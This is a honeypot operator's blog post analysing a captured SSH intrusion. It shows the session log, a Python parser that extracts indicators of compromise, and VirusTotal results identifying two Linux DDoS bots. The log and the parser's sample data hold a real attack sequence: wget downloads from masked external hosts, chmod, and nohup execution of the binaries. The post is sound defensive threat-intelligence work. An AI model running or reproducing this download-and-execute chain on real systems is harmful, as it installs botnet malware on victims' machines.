
New fresh Linux malware harvested from our SSH honeypot

Posted by pcsl_admin, 6 years ago

Our SSH honeypot recorded a fresh SSH attack; here is the session log (the credentials and the attacker's addresses are masked with x's):

[0x0000655b],[0x00007f2079700780],[info],[0],session username:xxxxxxx password:xxxxxxx
[0x0000655b],[0x00007f2079700780],[notification],[1],login successful
[0x0000655b],[0x00007f2079700780],[notification],[2],log name /opt/Debug/xxxx.log
[0x0000655b],[0x00007f2079700780],[notification],[3],Opened Shell
[0x0000655b],[0x00007f2079700780],[info],[4],$
[0x0000655b],[0x00007f2079700780],[info],[5],stdin write
[0x0000655b],[0x00007f2079700780],[info],[6],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[7],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[8],--2017-02-12 15:48:27--  http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[9],Connecting to xxx.xxx.248.189:281...
[0x0000655b],[0x00007f2079700780],[info],[10],stdin write
[0x0000655b],[0x00007f2079700780],[info],[11],chmod 777 c32
[0x0000655b],[0x00007f2079700780],[info],[12],chmod 777 c32
[0x0000655b],[0x00007f2079700780],[info],[13],stdin write
[0x0000655b],[0x00007f2079700780],[info],[14],chmod +x c32
[0x0000655b],[0x00007f2079700780],[info],[15],chmod +x c32
[0x0000655b],[0x00007f2079700780],[info],[16],stdin write
[0x0000655b],[0x00007f2079700780],[info],[17],nohup ./c32 &
[0x0000655b],[0x00007f2079700780],[info],[18],nohup ./c32 &
[0x0000655b],[0x00007f2079700780],[info],[19],stdin write
[0x0000655b],[0x00007f2079700780],[info],[20],./c32 &
[0x0000655b],[0x00007f2079700780],[info],[21],./c32 &
[0x0000655b],[0x00007f2079700780],[info],[22],stdin write
[0x0000655b],[0x00007f2079700780],[info],[23],cd /tmp
[0x0000655b],[0x00007f2079700780],[info],[24],cd /tmp
[0x0000655b],[0x00007f2079700780],[info],[25],stdin write
[0x0000655b],[0x00007f2079700780],[info],[26],wget http://xxx.xxx.248.71:2/xmxm
[0x0000655b],[0x00007f2079700780],[info],[27],wget http://xxx.xxx.248.71:2/xmxm
[0x0000655b],[0x00007f2079700780],[info],[28],stdin write
[0x0000655b],[0x00007f2079700780],[info],[29],chmod 777 xmxm
[0x0000655b],[0x00007f2079700780],[info],[30],chmod 777 xmxm
[0x0000655b],[0x00007f2079700780],[info],[31],stdin write
[0x0000655b],[0x00007f2079700780],[info],[32],nohup xmxm &
[0x0000655b],[0x00007f2079700780],[info],[33],nohup xmxm &
[0x0000655b],[0x00007f2079700780],[info],[34],stdin write
[0x0000655b],[0x00007f2079700780],[info],[35],./xmxm &
[0x0000655b],[0x00007f2079700780],[info],[36],./xmxm &
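The session above follows a fixed download, chmod, execute pattern that is easy to pick out of this log format automatically. What follows is an added example, not code from the original post or from PCSL's honeypot: a small Python parser for records of the form `[session],[thread],[level],[seq],message`. It treats the record after each `stdin write` as the attacker's typed command, ignores the prompt, the shell echo and command output, and collects the credentials, download URLs, chmod targets and executed files. `SAMPLE_LOG` is constructed in the same format with placeholder credentials and addresses, and the `triage` rules (a download-chmod-execute chain, a payload served from a non-standard port) are my own assumptions about what is worth flagging, not rules from the post.

```python
"""Pull attacker commands and IOCs out of a honeypot session log.

Record format assumed from the log above: [session],[thread],[level],[seq],message
A "stdin write" record means the NEXT record is what the attacker typed; the shell's
echo of the command and any command output follow as ordinary records.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample in the honeypot's format; credentials and addresses are placeholders.
SAMPLE_LOG = """\
[0x0000655b],[0x00007f2079700780],[info],[0],session username:root password:123456
[0x0000655b],[0x00007f2079700780],[notification],[1],login successful
[0x0000655b],[0x00007f2079700780],[notification],[3],Opened Shell
[0x0000655b],[0x00007f2079700780],[info],[4],$
[0x0000655b],[0x00007f2079700780],[info],[5],stdin write
[0x0000655b],[0x00007f2079700780],[info],[6],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[7],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[8],--2017-02-12 15:48:27--  http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[9],
Connecting to xxx.xxx.248.189:281...
[0x0000655b],[0x00007f2079700780],[info],[10],stdin write
[0x0000655b],[0x00007f2079700780],[info],[11],chmod 777 c32
[0x0000655b],[0x00007f2079700780],[info],[13],stdin write
[0x0000655b],[0x00007f2079700780],[info],[14],nohup ./c32 &
[0x0000655b],[0x00007f2079700780],[info],[16],stdin write
[0x0000655b],[0x00007f2079700780],[info],[17],cd /tmp
[0x0000655b],[0x00007f2079700780],[info],[18],stdin write
[0x0000655b],[0x00007f2079700780],[info],[19],wget http://xxx.xxx.248.71:2/xmxm
[0x0000655b],[0x00007f2079700780],[info],[20],stdin write
[0x0000655b],[0x00007f2079700780],[info],[21],chmod +x /tmp/xmxm
[0x0000655b],[0x00007f2079700780],[info],[22],stdin write
[0x0000655b],[0x00007f2079700780],[info],[23],nohup xmxm &
"""

LINE_RE = re.compile(
    r"^\[(?P<session>0x[0-9a-f]+)\],\[(?P<thread>0x[0-9a-f]+)\],"
    r"\[(?P<level>\w+)\],\[(?P<seq>\d+)\],(?P<msg>.*)$"
)
CRED_RE = re.compile(r"session username:(\S+) password:(\S*)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# numeric mode (777) or symbolic mode (+x, u+rwx) followed by the target path
CHMOD_RE = re.compile(r"\bchmod\s+(?:[0-7]{3,4}|[ugoa]*[+=-][rwxXst]+)\s+(\S+)")
# "nohup ./c32 &", "./xmxm &", "nohup xmxm &": a file launched in the background
EXEC_RE = re.compile(r"(?:^|\s)(?:nohup\s+)?(?:\./)?([\w.-]+)\s*&\s*$")


def _basename(path: str) -> str:
    return path.rstrip("/").rsplit("/", 1)[-1]


@dataclass
class Session:
    session_id: str = ""
    username: str = ""
    password: str = ""
    commands: list = field(default_factory=list)       # what the attacker typed, in order
    urls: list = field(default_factory=list)           # download URLs in those commands
    chmod_targets: list = field(default_factory=list)  # basenames made executable
    executed: list = field(default_factory=list)       # basenames launched with "&"

    @property
    def dropped_files(self) -> list:
        return [_basename(urlparse(u).path) for u in self.urls]

    @property
    def download_chmod_exec_chain(self) -> list:
        """Files that were downloaded, made executable and then run."""
        return sorted(set(self.dropped_files) & set(self.chmod_targets) & set(self.executed))


def parse_session(text: str) -> Session:
    s = Session()
    expect_command = False
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # wrapped command output (e.g. wget progress), not a record
        s.session_id = s.session_id or m.group("session")
        msg = m.group("msg").strip()
        cred = CRED_RE.match(msg)
        if cred:
            s.username, s.password = cred.groups()
            continue
        if msg == "stdin write":
            expect_command = True
            continue
        if not expect_command:
            continue  # prompt, shell echo or command output
        expect_command = False
        s.commands.append(msg)
        s.urls.extend(URL_RE.findall(msg))
        s.chmod_targets.extend(_basename(t) for t in CHMOD_RE.findall(msg))
        ex = EXEC_RE.search(msg)
        if ex:
            s.executed.append(ex.group(1))
    return s


def triage(s: Session) -> list:
    """Assumed SOC rules: flag the drop-and-run chain and payloads served on odd ports."""
    findings = []
    if s.download_chmod_exec_chain:
        findings.append("download->chmod->execute chain: " + ", ".join(s.download_chmod_exec_chain))
    for u in s.urls:
        p = urlparse(u)
        if p.port not in (None, 80, 443):
            findings.append(f"payload fetched from non-standard port {p.hostname}:{p.port}")
    return findings


if __name__ == "__main__":
    sess = parse_session(SAMPLE_LOG)
    print(f"{sess.username}:{sess.password} -> {len(sess.commands)} commands typed")
    for finding in triage(sess):
        print("  -", finding)
```

Keying on the `stdin write` marker rather than deduplicating repeated lines is deliberate: it keeps wget's own output (which also contains the URL) out of the command list, so the IOC list only reflects what the attacker actually typed.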

Note the pattern: each binary is fetched with wget from a non-standard port (281, then 2), made world-executable, and launched in the background with nohup; the second one is dropped in /tmp. The two new samples:

The file c32 was new to VirusTotal at the time, with only 6 of 54 engines flagging it, all of them as a Linux DDoS bot (ChinaZ / DnsAmp); here is the link:

https://www.virustotal.com/en/file/7939736761004fcfd0210cce4b8a24a84b3b72b3f223af0643a0f1b75cf3da75/analysis/

SHA256: 7939736761004fcfd0210cce4b8a24a84b3b72b3f223af0643a0f1b75cf3da75
File name: c32
Detection ratio: 6 / 54
Analysis date: 2017-02-12 15:21:14 UTC ( 49 minutes ago )
Antivirus          Result                           Update
AVG                Linux/ChinaZ                     20170212
AegisLab           Troj.Ddos.Linux!c                20170212
Avira (no cloud)   LINUX/DnsAmp.zifrw               20170212
ESET-NOD32         a variant of Linux/Dnsamp.J      20170212
Kaspersky          HEUR:Trojan-DDoS.Linux.Kluh.a    20170212
Qihoo-360          Win32/Trojan.DDoS.526            20170212

The file xmxm was also new to VirusTotal but is far better covered (32 of 55): the vendor names differ (Setag, Gates, Elknot, Ganiw, Chikdos), yet they all describe a Linux DDoS backdoor. Here is the link:

https://www.virustotal.com/en/file/b28813d81653831faf5b046ccb1a4ff87528586ecf3a2424c03871e47bf9b824/analysis/

SHA256: b28813d81653831faf5b046ccb1a4ff87528586ecf3a2424c03871e47bf9b824
Detection ratio: 32 / 55
Analysis date: 2017-02-11 20:05:04 UTC ( 20 hours, 9 minutes ago )
Antivirus              Result                                    Update
ALYac                  Trojan.Agent.Linux.A                      20170211
AVG                    Linux/BackDoor_c.CL                       20170211
Ad-Aware               Trojan.Agent.Linux.A                      20170211
AhnLab-V3              Linux/Backdoor.1223123.B                  20170211
Antiy-AVL              Trojan[Backdoor]/Linux.Ganiw.a            20170211
Arcabit                Trojan.Agent.Linux.A                      20170211
Avast                  ELF:Elknot-AE [Trj]                       20170211
Avira (no cloud)       LINUX/Setag.kzmdl                         20170211
BitDefender            Trojan.Agent.Linux.A                      20170211
CAT-QuickHeal          Backdoor.Linux.Setag.E                    20170211
ClamAV                 Unix.Trojan.Agent-37008                   20170211
DrWeb                  Linux.BackDoor.Gates.9                    20170211
ESET-NOD32             Linux/Setag.B.Gen                         20170211
Emsisoft               Trojan.Agent.Linux.A (B)                  20170211
F-Secure               Trojan.Agent.Linux.A                      20170211
Fortinet               ELF/Ganiw.A!tr                            20170211
GData                  Trojan.Agent.Linux.A                      20170211
Ikarus                 Trojan.Linux.Setag                        20170211
Jiangmin               Backdoor/Linux.io                         20170211
Kaspersky              HEUR:Backdoor.Linux.Ganiw.d               20170211
McAfee                 Linux/Gates                               20170211
McAfee-GW-Edition      Linux/Gates                               20170211
eScan                  Trojan.Agent.Linux.A                      20170211
Microsoft              Backdoor:Linux/Setag!rfn                  20170211
NANO-Antivirus         Trojan.Unix.Ganiw.ditcrf                  20170210
Qihoo-360              virus.elf.ddos.f                          20170211
Rising                 Backdoor.Setag/Linux!1.A3E5 (classic)     20170211
Sophos                 Linux/DDoS-BD                             20170211
Symantec               Linux.Chikdos.B!gen2                      20170211
TrendMicro             ELF_SETAG.SM                              20170211
TrendMicro-HouseCall   ELF_SETAG.SM                              20170211
Zillya                 Trojan.Agent.Linux.12                     20170210

    © 2008-2019 All rights reserved. Jiaxing Chenxiang Information Technology Co., Ltd.